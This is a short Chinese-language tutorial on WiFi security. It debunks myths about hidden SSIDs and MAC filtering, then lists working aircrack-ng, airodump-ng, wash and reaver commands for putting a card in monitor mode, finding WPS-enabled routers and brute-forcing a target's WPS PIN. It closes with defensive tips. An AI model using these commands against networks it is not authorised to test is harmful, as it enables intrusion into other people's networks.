wifi安全研究
常见的关于wifi安全的误区:
隐藏wifi网络,其他人就搜不到了。 这是不对的,隐藏只是不发送SSID的广播了,但是通过无线扫描,仍然能扫到。
使用无线网络连接的黑名单,可以不让指定mac连接。 并不能,只要有人想黑你的wifi,它是可以伪造mac地址的。所以,无论黑名单和白名单都无用。
今天我们就来研究下wifi安全吧:
安装所需包
sudo apt-get install aircrack-ng reaver
创建虚拟接口
先查看下本地无线网卡:
iwconfig
启动无线网卡的监听模式:
sudo airmon-ng check kill
sudo airmon-ng start wlan1
可能会出现如下错误
wlan0 Unknown brcmfmac_sdio - [phy0]mon0: ERROR while getting interface flags: No such device
(monitor mode enabled on mon0)
当你看到上面的错误,说明你的网卡不支持监听模式,包括树莓派3的网卡也是不支持监听模式的,详见:
扫描查看附近热点
查看附近所有wifi信号
sudo airodump-ng mon0
查看支持WPS的wifi信号
sudo wash -i mon0 -C
暴力破解PIN码
reaver -i mon0 -b 目标路由的mac地址 -vv -a
#可选参数
#设置PIN破解间隔
# -d 3
怎么防止wifi被破解
其实防止wifi破解很简单,只要做好以下几点就可以:
- 足够复杂的密码,长度在10位以上而且包含字母数字和特殊符合,并且无任何意义。
- 不要在自己的手机上装WIFI破解类软件,若使用他们连接wifi,会被记录wifi密码,wifi名称和地理位置。
- 选用支持访客模式的路由,方便给朋友之类的使用,不用时关闭。
- 不要选用支持WPS之类一键登录的无线路由。